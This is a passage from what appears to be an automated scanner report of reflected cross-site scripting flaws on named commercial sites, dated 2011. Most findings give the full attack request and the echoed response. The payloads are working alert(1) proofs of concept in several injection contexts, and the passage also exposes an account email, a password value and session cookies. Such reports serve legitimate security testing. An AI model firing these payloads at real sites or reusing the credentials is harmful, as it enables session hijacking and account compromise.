The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the c?url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee19"><script>alert(1)</script>7e3f5c1ce7b was submitted in the c?url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c?url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93d52"-alert(1)-"3853defa198 was submitted in the c?url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c?url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c46a'-alert(1)-'726db27dea2 was submitted in the c?url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.90. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://de17a.com
Path: /a/41565.iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 234df"><script>alert(1)</script>365dc5ee018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.91. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://de17a.com
Path: /a/41565.iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af784'-alert(1)-'d1d4270fbfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.92. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://de17a.com
Path: /a/41565.iframe
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a472b"-alert(1)-"0b25fc585f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0ab'-alert(1)-'5a57fb80789 was submitted in the aid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=2448e0ab'-alert(1)-'5a57fb80789&tax=microsoft HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK
Date: Thu, 04 Aug 2011 02:29:59 GMT
Server: Apache/2.2.9
Expires: Thu, 04 Aug 2011 02:59:59 GMT
Last-Modified: Thu, 04 Aug 2011 02:29:59 GMT
Content-Length: 232
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=2448e0ab'-alert(1)-'5a57fb80789&tax=microsoft';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
2.94. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://display.digitalriver.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20f02'-alert(1)-'8212d8e5b54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=microsoft&20f02'-alert(1)-'8212d8e5b54=1 HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK
Date: Thu, 04 Aug 2011 02:30:00 GMT
Server: Apache/2.2.9
Expires: Thu, 04 Aug 2011 03:00:00 GMT
Last-Modified: Thu, 04 Aug 2011 02:30:00 GMT
Content-Length: 235
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=microsoft&20f02'-alert(1)-'8212d8e5b54=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20c10'-alert(1)-'d3cdeb66c64 was submitted in the tax parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aid=244&tax=microsoft20c10'-alert(1)-'d3cdeb66c64 HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK
Date: Thu, 04 Aug 2011 02:30:00 GMT
Server: Apache/2.2.9
Expires: Thu, 04 Aug 2011 03:00:00 GMT
Last-Modified: Thu, 04 Aug 2011 02:30:00 GMT
Content-Length: 232
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=microsoft20c10'-alert(1)-'d3cdeb66c64';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 5b2e2<script>alert(1)</script>c59e91a205d was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store?SiteID=msstore&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=383363005b2e2<script>alert(1)</script>c59e91a205d&size=1000&version=2&output=json&content=displayName+msSearchRank+msImage_S&orderBy=msSearchRank+descending&catalog=false&jsonp=dr.autocomplete.initialize HTTP/1.1
Host: dri1.img.digitalrivercontent.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK
Content-Length: 374397
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Thu, 04 Aug 2011 02:36:16 GMT
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: private
Access-Control-Allow-Origin: *
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: max-age=86400
Expires: Fri, 05 Aug 2011 02:36:37 GMT
Date: Thu, 04 Aug 2011 02:36:37 GMT
Connection: close

/* Digital River ProductInfo Widget */
/* JSON Output */
dr.autocomplete.initialize({"productInfo":{"categoryID":"383363005b2e2<script>alert(1)</script>c59e91a205d","startIndex":0,"size":1000,"totalSize":1005,"product":[{"productID":216507400,"displayName":"Kinect for Xbox 360","msSearchRank":9,"msImage_S":"hardware/cart/en-US_Xbox360_Kinect_Sensor_LPF-00004.jpg ...[SNIP]...
The value of the output request parameter is copied into a JavaScript inline comment. The payload 13c27*/alert(1)//b6adf105f78 was submitted in the output parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store?SiteID=msstore&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=38336300&size=1000&version=2&output=json13c27*/alert(1)//b6adf105f78&content=displayName+msSearchRank+msImage_S&orderBy=msSearchRank+descending&catalog=false&jsonp=dr.autocomplete.initialize HTTP/1.1
Host: dri1.img.digitalrivercontent.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK
Content-Length: 261643
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Thu, 04 Aug 2011 02:36:51 GMT
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: private
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: max-age=86400
Expires: Fri, 05 Aug 2011 02:36:59 GMT
Date: Thu, 04 Aug 2011 02:36:59 GMT
Connection: close
The value of the INIT request parameter is copied into the XML document as plain text between tags. The payload a444c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>c44e3c3b82c was submitted in the INIT parameter. This input was echoed as a444c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c44e3c3b82c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the flashINIT request parameter is copied into the XML document as plain text between tags. The payload 40c6b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>a213b663f58 was submitted in the flashINIT parameter. This input was echoed as 40c6b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>a213b663f58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 50b07<script>alert(1)</script>d134b251f59 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=Zr7DxOZ9tRO&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B50b07<script>alert(1)</script>d134b251f59 HTTP/1.1
Host: frontend-loadbalancer.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 02 Aug 2011 18:34:40 GMT
Etag: "7466ea447b7cc0bebd03d2ab15e689727215ee63"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 01 Aug 2012 18:34:40 GMT; Path=/
Set-Cookie: uid=c24daa55-d689-43c1-bfdf-08ee61c39dda; Domain=.meteorsolutions.com; expires=Wed, 01 Aug 2012 18:34:40 GMT; Path=/
Content-Length: 174
Connection: keep-alive
The value of the challengeReason request parameter is copied into the HTML document as plain text between tags. The payload 82a53<script>alert(1)</script>c9d82fda620 was submitted in the challengeReason parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the username request parameter is copied into the HTML document as plain text between tags. The payload c31db<script>alert(1)</script>b73e69cbf43 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the email request parameter is copied into the HTML document as plain text between tags. The payload edf33<script>alert(1)</script>4b930307c05 was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:43:48 GMT
cache-control: no-cache, no-store, must-revalidate, maxage=0
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
google-bot: noarchive
Set-Cookie: JSESSIONID=FF4B518E092DFED295521516D66D5C61; Path=/; Secure
SP_HEADERS: {"SP_HEADER_VERSION":"1312317828248","secondFactor":false,"csrf":"de8f5788-c607-47d0-a6a2-6e19b91eec62","status":"NONE","authLevel":"NONE","authenticated":false,"identified":false}
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Content-Length: 728
Connection: close
{"spHeader":{"SP_HEADER_VERSION":"1312317828248","secondFactor":false,"csrf":"de8f5788-c607-47d0-a6a2-6e19b91eec62","errors":[{"message":"Please use a valid email address.","details":{"originalValue":"rtfm@fastdial.netedf33<script>alert(1)</script>4b930307c05","fieldName":"email"},"code":113},{"message":"Unsupported characters entered.","details":{"originalValue":"rtfm@fastdial.netedf33<script> ...[SNIP]...
The value of the passwd request parameter is copied into the HTML document as plain text between tags. The payload 302a8<script>alert(1)</script>aa7570b5f14 was submitted in the passwd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
{"spHeader":{"SP_HEADER_VERSION":"1312317829364","secondFactor":true,"username":"rtfm@fastdial.net","errors":[{"message":"Too many characters in the input field.","details":{"originalValue":"LL123456302a8<script>alert(1)</script>aa7570b5f14","fieldName":"passwd"},"code":106}],"deviceName":"Public Device","status":"INACTIVE","developer":false,"authLevel":"SESSION_AUTHENTICATED","authenticated":true,"betaTester":false,"identified":true,"su ...[SNIP]...
The value of the termsVersion request parameter is copied into the HTML document as plain text between tags. The payload adbf7<script>alert(1)</script>439858c3c6a was submitted in the termsVersion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the time request parameter is copied into the name of an HTML tag attribute. The payload 84a47%20style%3dx%3aexpression(alert(1))%2076d3929e13c was submitted in the time parameter. This input was echoed as 84a47 style=x:expression(alert(1)) 76d3929e13c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /examples/jsp/cal/cal2.jsp?time=1%20ns=alert(0x0010A4)%2084a47%20style%3dx%3aexpression(alert(1))%2076d3929e13c HTTP/1.1
Host: home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=BA46212703D4F25C39A99E1396FB6FB1
Connection: keep-alive
Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:26:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1402
Connection: close
<HTML> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding ...[SNIP]... <INPUT NAME="time" TYPE=HIDDEN VALUE=1 ns=alert(0x0010A4) 84a47 style=x:expression(alert(1)) 76d3929e13c <BR> ...[SNIP]...
The value of the time request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 28672%20style%3dx%3aexpression(alert(1))%20402ba77607c was submitted in the time parameter. This input was echoed as 28672 style=x:expression(alert(1)) 402ba77607c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /examples/jsp/cal/cal2.jsp?time=28672%20style%3dx%3aexpression(alert(1))%20402ba77607c HTTP/1.1
Host: home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=BA46212703D4F25C39A99E1396FB6FB1
Connection: keep-alive
Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:26:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1360
Connection: close
<HTML> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding ...[SNIP]... <INPUT NAME="time" TYPE=HIDDEN VALUE=28672 style=x:expression(alert(1)) 402ba77607c <BR> ...[SNIP]...
2.108. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://i1.services.social.microsoft.com
Path: /search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cdb8<img%20src%3da%20onerror%3dalert(1)>8916b0dd0a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cdb8<img src=a onerror=alert(1)>8916b0dd0a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK
ntCoent-Length: 12994
Content-Type: application/x-javascript
ETag: d68b8b3868d1cc3454a4ba2920a2ee94
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB37
Content-Length: 12994
Cache-Control: public, max-age=43200
Expires: Sun, 07 Aug 2011 13:23:28 GMT
Date: Sun, 07 Aug 2011 01:23:28 GMT
Connection: close
Vary: Accept-Encoding
2.109. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://i2.services.social.microsoft.com
Path: /search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12673<img%20src%3da%20onerror%3dalert(1)>877390d11ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12673<img src=a onerror=alert(1)>877390d11ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK
ntCoent-Length: 12973
Content-Type: application/x-javascript
ETag: ed3efaf8cbef8f2ec12fb308aa577174
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12973
Cache-Control: public, max-age=43200
Expires: Fri, 05 Aug 2011 04:20:15 GMT
Date: Thu, 04 Aug 2011 16:20:15 GMT
Connection: close
Vary: Accept-Encoding
2.110. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://i3.services.social.microsoft.com
Path: /search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62274<img%20src%3da%20onerror%3dalert(1)>e64046ddfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62274<img src=a onerror=alert(1)>e64046ddfb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 9bdeb11e4493d38cbbd74dd9e776d9c4
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB36
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Thu, 04 Aug 2011 14:24:16 GMT
Date: Thu, 04 Aug 2011 02:24:16 GMT
Content-Length: 12967
Connection: close
2.111. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://i4.services.social.microsoft.com
Path: /search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f2ce<img%20src%3da%20onerror%3dalert(1)>f78a009ec99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f2ce<img src=a onerror=alert(1)>f78a009ec99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK
ntCoent-Length: 12994
Content-Type: application/x-javascript
ETag: 5ead7fd37a00d85d48edb100f901e032
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB37
Content-Length: 12994
Cache-Control: public, max-age=43201
Expires: Fri, 05 Aug 2011 04:21:01 GMT
Date: Thu, 04 Aug 2011 16:21:00 GMT
Connection: close
Vary: Accept-Encoding
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33ec2<script>alert(1)</script>c74053c8b26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8bc63<script>alert(1)</script>dfdbbe7ae39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7368<a>46a3bdce52f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ff83d<img%20src%3da%20onerror%3dalert(1)>f044ec12716 was submitted in the id parameter. This input was echoed as ff83d<img src=a onerror=alert(1)>f044ec12716 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /is/image//EB/05712487?req=imageset,json&id=147405806ff83d<img%20src%3da%20onerror%3dalert(1)>f044ec12716&_=1312290882134 HTTP/1.1
Host: images.eastbay.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: "8968a8dad1b55c9aa38a1d1d5bdccc9d"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 150
Expires: Tue, 02 Aug 2011 13:20:47 GMT
Date: Tue, 02 Aug 2011 13:14:47 GMT
Connection: close
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa2f"-alert(1)-"6c2c16cea06 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112cfa2f"-alert(1)-"6c2c16cea06&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36973'%3balert(1)//dba0f6a02ac was submitted in the mpck parameter. This input was echoed as 36973';alert(1)//dba0f6a02ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D782011111236973'%3balert(1)//dba0f6a02ac&mpt=7820111112&mpvc= HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: keep-alive
Proxy-Connection: keep-alive
